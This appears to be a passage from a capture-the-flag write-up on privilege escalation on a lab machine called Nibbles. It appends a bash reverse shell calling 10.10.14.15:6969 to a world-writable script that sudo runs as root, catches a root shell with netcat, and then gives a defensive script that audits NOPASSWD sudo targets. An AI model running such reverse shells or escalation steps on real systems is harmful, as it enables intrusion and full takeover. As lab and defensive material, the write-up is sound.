4 privesc
$ unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
$ tree
.
└── stuff
    └── monitor.sh
$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
$ ls -la
total 16
drwxr-xr-x 2 nibbler nibbler 4096 May 4 17:40 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4095 May 4 17:39 monitor.sh
monitor.sh is world-writable and the sudo rule runs it as root with NOPASSWD, so we can append a reverse shell to it:
$ echo "bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'" >> monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.75] 36550
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
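
A defender-side check for the misconfiguration used above, as an added example that is not part of the original writeup: it pulls NOPASSWD targets out of `sudo -l` output and flags every path component that is missing, not owned by root, or writable by group/other. The function names are hypothetical and it assumes GNU coreutils (`stat -c`, `readlink -f`).

```shell
#!/bin/sh
# Added example (not from the writeup). Assumes GNU stat/readlink on Linux.

# Print absolute command paths from NOPASSWD rules in `sudo -l` output (stdin).
nopasswd_targets() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p' |
        tr ',' '\n' |
        awk '$1 ~ /^\// { print $1 }'
}

# True (exit 0) if octal mode $1 grants group or other write.
mode_is_loose() {
    [ $(( 0$1 & 022 )) -ne 0 ]
}

# Check the target and every parent directory up to /.
# A missing file in a user-controlled directory is as bad as a writable one,
# because the user can simply create it. Returns 1 if anything was reported.
audit_target() {
    p=$(readlink -f -- "$1") || p=$1
    bad=0
    while :; do
        if [ -e "$p" ]; then
            set -- $(stat -c '%u %a' -- "$p")
            if [ "$1" -ne 0 ] || mode_is_loose "$2"; then
                echo "UNSAFE $p (uid=$1 mode=$2)"
                bad=1
            fi
        else
            echo "MISSING $p"
            bad=1
        fi
        [ "$p" = / ] && break
        p=$(dirname -- "$p")
    done
    return $bad
}

# Constructed sample: the rule from the sudo -l output above.
# On a live host, feed real output instead: sudo -l | nopasswd_targets
SAMPLE='    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'
printf '%s\n' "$SAMPLE" | nopasswd_targets | while read -r t; do
    audit_target "$t" || true
done
```

On this box the check would report monitor.sh itself (mode 777, owned by nibbler) and the nibbler-owned directories above it, so tightening the file mode alone would not close the hole.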